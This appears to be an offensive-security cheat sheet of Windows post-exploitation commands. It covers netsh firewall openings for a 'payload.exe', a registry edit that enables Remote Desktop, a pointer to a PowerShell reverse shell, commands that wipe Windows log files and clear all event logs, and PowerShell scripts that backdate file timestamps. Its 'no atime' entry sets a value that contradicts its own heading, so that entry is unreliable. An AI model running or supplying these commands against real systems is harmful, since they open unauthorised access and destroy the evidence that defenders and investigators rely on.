Windows Tricks#

A short bag of host-level tradecraft for the operator working a Windows box. Firewall manipulation, Remote Desktop enable, NTFS last-access flag, log cleanup, and timestamp doctoring. Two-sided material, the operator uses these to make room for staging, the defender uses them to spot what the adversary touched.

Firewall#

Allow payload traffic.

$ netsh firewall add allowedprogram C:\payload.exe MyPayload ENABLE

Open and delete a port.

$ netsh firewall add portopening TCP 1234 MyPayload ENABLE ALL
$ netsh firewall delete portopening TCP 1234

Enable RDP#

$ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

NTFS no atime#

$ reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v NtfsDisableLastAccessUpdate /d 0 /t REG_DWORD /f

Reverse shell#

PowerShell reverse TCP shell at ZHacker13/ReverseTCPShell.

Cover tracks#

Wipe WINDIR log files.

$ del %WINDIR%\*.log /a /s /q /f

Clear all system log files.

$ for /f %a in ('wevtutil el') do @wevtutil cl "%a"

Delete a specific system log.

$ wevtutil el                                     # list system logs
$ wevtutil cl [LOGNAME]                            # delete specific log
$ wevtutil el | Foreach-Object {wevtutil cl "$_"}

Timestomp#

Change directory creation, modification, access times via PowerShell.

PS> (Get-Item "C:\Windows\system32\MyDir").CreationTime=("01 March 2019 19:00:00")
PS> (Get-Item "C:\Windows\system32\MyDir\payload.txt").LastWriteTime=("01 March 2019 19:00:00")
PS> (Get-Item "C:\Windows\system32\MyDir\payload.txt").LastAccessTime=("01 March 2019 19:00:00")

Bulk-change creation time in the current directory.

$files = Get-ChildItem -force | Where-Object {! $_.PSIsContainer}
foreach($object in $files)
{
    $object.CreationTime=("01 March 2019 19:00:00")
}

References#